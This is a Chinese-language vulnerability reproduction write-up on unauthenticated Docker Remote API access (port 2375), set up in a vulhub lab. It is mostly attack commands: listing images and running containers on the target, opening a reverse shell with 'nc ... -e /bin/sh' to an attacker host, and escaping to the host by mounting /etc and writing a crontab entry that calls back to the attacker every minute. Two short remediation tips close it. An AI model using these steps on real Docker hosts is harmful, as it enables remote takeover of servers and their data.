影响范围
Docker ALL
漏洞类型
未授权访问类
利用条件
影响范围应用
漏洞概述
Docker Remote API是一个取代远程命令行界面(RCLI)的REST API,当该接口直接暴漏在外网环境中且未作权限检查时,攻击者可以通过恶意调用相关的API实现远程命令执行
漏洞复现
环境搭建
下载环境
代码语言:javascript复制mkdir docker
cd docker
wget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/Dockerfile
wget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/docker-compose.yml
wget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/docker-entrypoint.sh
之后给docker-entrypoint.sh赋予执行权限
代码语言:javascript复制chmod 777 docker-entrypoint.sh
编译并启动环境
代码语言:javascript复制docker-compose up -d
漏洞利用
漏洞检测
代码语言:javascript复制docker -H tcp://192.168.17.140:2375 images
反弹shell
Step 1:在VPS上监听9999端口
代码语言:javascript复制nc -lnvp 9999
Step 2:查看目标系统上存在的镜像
代码语言:javascript复制docker -H tcp://192.168.17.140:2375 images
Step 3:之后创建一个轻量级镜像
代码语言:javascript复制docker -H tcp://192.168.17.140:2375 run -id alpine:latest
Step 4:查看运行的容器信息获取对应的容器ID
代码语言:javascript复制docker -H tcp://192.168.17.140:2375 ps
Step 5:进入容器并通过nc进行反弹shell
代码语言:javascript复制docker -H tcp://192.168.17.140:2375 exec -it cbb678549422 sh
nc 192.168.17.128 9999 -e /bin/sh
Step 6:在攻击主机中成功接收到shell
Step 7:退出并删除容器
代码语言:javascript复制exit
docker -H tcp://192.168.17.140:2375 rm cbb678549422 -f
docker -H tcp://192.168.17.140:2375 ps
物理主机
我们可以在创建容器时将物理主机的计划任务目录挂载到容器中的可写目录中,之后通过在容器中对计划任务进行编辑间接性实现对物理主机中计划任务的编辑,从而实现获取物理主机权限的目的,下面进行简单演示:
Step 1:检测是否存在漏洞
代码语言:javascript复制docker -H tcp://192.168.17.140:2375 images
Step 2:在攻击主机中设置监听
Step 3:将宿主机的系统计划任务目录(/etc/crontab)挂载到容器中的/tmp目录下
代码语言:javascript复制docker -H tcp://192.168.17.140:2375 run -id -v /etc/:/tmp/etc alpine:latest
Step 4:查看运行的容器信息获取对应的容器ID
代码语言:javascript复制docker -H tcp://192.168.17.140:2375 ps
Step 5:远程访问容器并写入计划任务
代码语言:javascript复制docker -H tcp://192.168.17.140:2375 exec -it f9e17c91eda2 sh
crontab -e
* * * * * /usr/bin/nc 192.168.17.128 9999 -e /bin/sh
crontab -l
Step 6:反弹shell
目标检索
暂不提供
修复建议
1、对2375端口做网络访问控制,例如:ACL控制
2、修改docker swarm的认证方式,使用TLS认证
